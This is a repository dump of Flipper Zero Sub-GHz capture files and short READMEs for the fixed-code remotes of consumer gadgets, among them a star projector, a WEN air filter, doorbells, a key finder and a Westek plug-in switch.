| Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0D 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Sound_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 1F 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_bright.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 14 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_color.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 12 8 | TE: 406 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_color_rev.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 11 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_dim.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 13 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 02 8 | TE: 403 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_off.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 03 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Space_on.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 01 8 | TE: 405 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Star_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0B 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Star_off.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0C 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Star_on.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0A 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Starry_galaxy_mode.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 0B 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Vol_down.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 07 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/Planet Projector Remote/Vol_up.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 FF FF 09 8 | TE: 404 9 | -------------------------------------------------------------------------------- /subghz/STI-3353_Doorbell/README.md: -------------------------------------------------------------------------------- 1 | Capture of an STI-3353 Doorbell. I was not able to get a parsed capture of this. 2 | -------------------------------------------------------------------------------- /subghz/WEN_3410_remote/On_speed.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 19319 -66 697 -198 2823 -130 687 -100 2911 -66 869 -68 1461 -132 1289 -98 261 -98 423 -132 1153 -132 363 -134 1485 -132 1363 -66 531 -132 2311 -100 1379 -100 1195 -100 1989 -64 691 -100 3017 -132 4839 -66 423 -66 989 -264 723 -102 395 -132 4421 -98 15757 -66 395 -66 423 -130 3253 -66 427 -66 2715 -164 1593 -100 1821 -66 11869 -100 457 -166 729 -66 363 -132 789 -100 663 -66 1595 -132 8989 -66 7357 -96 4375 -66 529 -66 889 -98 5465 -98 5511 -66 261 -130 393 -64 1319 -100 1327 -100 927 -98 327 -66 3383 -98 2419 -98 733 -66 801 -100 6431 -164 1147 -344 317 -324 281 -362 269 -340 311 -358 283 -326 303 -336 307 -358 283 -326 301 -336 309 -322 317 -326 303 -336 307 -322 319 -324 319 -304 317 -346 281 -362 283 -312 309 -366 285 -326 319 -310 309 -330 319 -326 317 -9962 955 -352 899 -362 285 -998 257 -1004 293 -996 255 -1026 903 -384 883 -356 937 -358 257 -1006 291 -972 937 -350 919 -370 905 -352 903 -360 285 -10626 945 -356 915 -348 285 -994 289 -974 291 -994 287 -994 901 -386 887 -362 941 -320 297 -984 289 -1012 905 -354 917 -372 919 -320 929 -360 283 -10634 915 -360 945 -348 265 -998 287 -1000 273 -990 281 -996 931 -346 921 -354 923 -334 317 -958 295 -1000 911 -352 919 -372 903 -354 935 -326 287 -162376 65 -566 65 -764 131 -100 301 -166 167 -166 265 -166 133 -100 267 -334 1825 -98 1913 -132 687 -130 947 -100 3585 -134 233 -66 1927 -132 3373 -66 2247 -100 2593 -100 4853 -100 2149 -68 3029 -64 1875 -98 653 -166 851 -98 5221 -68 10357 -66 5835 -68 4077 -66 4181 -66 3807 -130 2787 -100 1117 -164 293 -66 325 -100 229 -66 857 -68 397 -98 1589 -66 671 -66 1521 -330 1097 -66 233 -66 1065 -68 2315 -96 1053 -66 3583 -66 567 -98 1227 -66 4573 -98 555 -66 263 -64 455 -68 863 -66 627 -98 1913 -66 4277 -100 1201 -132 1051 -66 719 -198 721 -68 2229 -100 4879 -66 4179 -66 525 -132 1627 -100 1095 -66 10447 -66 617 -66 1979 -132 4519 -68 921 -198 3625 -66 293 -98 457 -98 10445 -166 1063 -134 1189 -98 559 -66 3031 -66 265 -166 1523 -100 3217 -66 9555 -66 465 -66 917 -66 757 -66 1033 -66 4121 -68 1923 -98 5241 -98 5801 -68 3941 -66 2885 -132 1049 -66 2659 -66 2377 -130 461 -66 1549 -66 1321 -66 2627 -100 463 -68 1561 -66 1971 -66 14593 -100 165 -68 4525 -66 2003 -66 953 -66 5019 -264 2337 -98 361 -132 5255 -66 7 | -------------------------------------------------------------------------------- /subghz/WEN_3410_remote/README.md: -------------------------------------------------------------------------------- 1 | Raw captures of a [WEN 3410-029RF-01 remote](https://wenproducts.com/products/3410-029rf-01-rf-remote-with-transmission-code-for-wen-3410), for a [WEN 3410](https://wenproducts.com/products/air-filtration-system-item-3410). 2 | 3 | Tested 7/1/2023 by the original requestor on Reddit. Thank you! 4 | 5 | SubGhz remote map added by requestor. Place .sub files in SD Card/subghz/WEN_3410_remote/ and remote file in SD Card/subghz/remote (or wherever you need it to go) 6 | -------------------------------------------------------------------------------- /subghz/WEN_3410_remote/image.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/subghz/WEN_3410_remote/image.jpeg -------------------------------------------------------------------------------- /subghz/WEN_3410_remote/remote/WEN_3410.txt: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubRem Map file 2 | Version: 1 3 | DOWN: /ext/subghz/WEN_3410_remote/Off.sub 4 | RIGHT: /ext/subghz/WEN_3410_remote/Time.sub 5 | OK: /ext/subghz/WEN_3410_remote/On_speed.sub 6 | DLABEL: 0ff 7 | RLABEL: Time 8 | OKLABEL: On-Speed 9 | -------------------------------------------------------------------------------- /subghz/dollar_general_pro_essentials_wireless_doorbell/Doorbell.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Princeton 6 | Bit: 24 7 | Key: 00 00 00 00 00 C7 17 0C 8 | TE: 287 9 | -------------------------------------------------------------------------------- /subghz/dollar_general_pro_essentials_wireless_doorbell/README.md: -------------------------------------------------------------------------------- 1 | Capture of the transmitter for a Pro Essentials Wireless Doorbell from Dollar General. With a sample size of two, it would tentatively appear that all pairs use the same button key. 2 | -------------------------------------------------------------------------------- /subghz/efamily_key_finder/README.md: -------------------------------------------------------------------------------- 1 | These are captures from the remote for an eFamily key locator set. 2 | 3 | #Usage 4 | 5 | 1.) Turn a tag on. It will continuously make long beep sounds. 6 | 2.) Using the Flipper, play the corresponding signal you want to program into the tag (ie, Tag1.sub gets played for the tag with the number 1) 7 | 3.) After the first play, the tag should be programmed to respond to that signal. After a brief moment, the tag should emit a series of repeating beeps when the signal is played back from the Flipper. 8 | 9 | These captures may work on other, similar key locators, but it has not been tested. 10 | -------------------------------------------------------------------------------- /subghz/westek_rfk_plug-in_receiver/README.md: -------------------------------------------------------------------------------- 1 | sub file for a Westek pair of Wireless Plug-in Receiver (Model 805) and Wall Switch Transmitter (RFA108), marked with a Channel Code B sticker. 2 | 3 | I had difficulty getting a clear reading of this signal. 4 | 5 | FCC documentation, page 14 of 16 indicates it's operating frequency is 305Mhz. 6 | https://apps.fcc.gov/eas/GetApplicationAttachment.html?id=1031148 7 | 8 | The Flipper was able to get several reads at different frequencies (and annoyingly, the Frequency Analyzer really only detects anything at 915Mhz, which must be a harmonic). 9 | 10 | So, here was the way to get this to work. Get a successful reading on any frequency that it picks up on. You're looking for a Holtek_HT12X 12b (not CAME). Save it as a sub. This switch has two buttons, but they send out the same button/key code, so you only need one sample. 11 | 12 | Open the sub on your computer and change the frequency to Frequency: 305000000 13 | 14 | Save the sub and place back on the Flipper. This worked immediately. 15 | 16 | The sub attached is from the procedure above. Note that this pair operates on Channel Code B. I do not have any other pairs to test. 17 | -------------------------------------------------------------------------------- /subghz/westek_rfk_plug-in_receiver/westek_rfa108_b.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz Key File 2 | Version: 1 3 | Frequency: 305000000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: Holtek_HT12X 6 | Bit: 12 7 | Key: 00 00 00 00 00 00 07 CF 8 | TE: 348 9 | --------------------------------------------------------------------------------